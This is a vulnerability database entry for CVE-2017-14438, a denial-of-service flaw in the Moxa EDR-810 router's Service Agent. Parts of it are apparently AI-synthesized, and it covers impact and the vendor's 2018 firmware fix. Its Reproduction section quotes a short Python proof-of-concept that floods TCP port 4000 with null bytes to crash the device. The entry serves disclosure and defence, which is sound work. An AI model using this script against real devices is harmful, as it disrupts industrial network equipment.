CVE-2017-14438
Description
Exploitable denial of service vulnerabilities exists in the Service Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted packet can cause a denial of service. An attacker can send a large packet to 4000/tcp to trigger this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A denial of service vulnerability in Moxa EDR-810 Service Agent allows remote attackers to crash the device by sending a large packet to TCP port 4000.
Vulnerability
The Moxa EDR-810 Service Agent, present in firmware version V4.1 build 17030317, listens on TCP and UDP port 4000. Improper input validation (CWE-20) in the handling of incoming data allows a specially crafted large packet to cause a crash. The vulnerability is triggered by sending a packet larger than expected, such as 5000 null bytes, to TCP port 4000 [1].
Exploitation
An attacker can exploit this vulnerability remotely without authentication. The attacker sends a large packet (e.g., 5000 bytes of zeros) to TCP port 4000 of the target device. The crash occurs consistently on the first attempt, as demonstrated by the proof-of-concept script provided in the advisory [1]. No user interaction or special network position is required beyond network access to the device.
Impact
Successful exploitation results in a denial of service, crashing the Service Agent and potentially the entire device. The impact is limited to availability loss (A:H); no confidentiality or integrity compromise is reported. The device may require a manual reboot to restore functionality.
Mitigation
The vendor released a patched firmware on April 12, 2018, which addresses this vulnerability. Users should update to the latest firmware version available from Moxa's website. No workarounds are documented. This vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog [1].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Talos/Moxav5Range: Moxa EDR-810 V4.1 build 17030317
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input size validation in the Service Agent allows oversized packets to cause a crash."
Attack vector
An unauthenticated attacker on the network sends a large packet (e.g., 5000 null bytes) to TCP port 4000 of the Moxa EDR-810. The Service Agent fails to validate the size of the incoming data, causing a crash and denial of service [CWE-20] [ref_id=1]. The same attack can be directed at TCP port 4001, though multiple attempts may be needed to trigger the crash consistently [ref_id=1].
Affected code
The Service Agent functionality of Moxa EDR-810 V4.1 build 17030317 listens on TCP/UDP port 4000 and TCP port 4001. Sending a large packet to these ports causes the Service Agent to crash [ref_id=1].
What the fix does
The advisory does not include a patch diff. The vendor (Moxa) released patched firmware on April 12, 2018 to address the vulnerability [ref_id=1]. The fix presumably adds input size validation to the Service Agent's packet handling on ports 4000 and 4001 to reject oversized packets before they cause a crash.
Preconditions
- networkThe attacker must be able to reach TCP port 4000 (or 4001) on the Moxa EDR-810 device
- authNo authentication is required
Reproduction
The following Python script from the Talos advisory crashes the Service Agent on port 4000 [ref_id=1]:
```python import socket host = '192.168.127.254' port = 4000 packet = "\x00" * 5000 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(packet) data = s.recv(1024) s.close ```
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1- www.talosintelligence.com/vulnerability_reports/TALOS-2017-0487mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.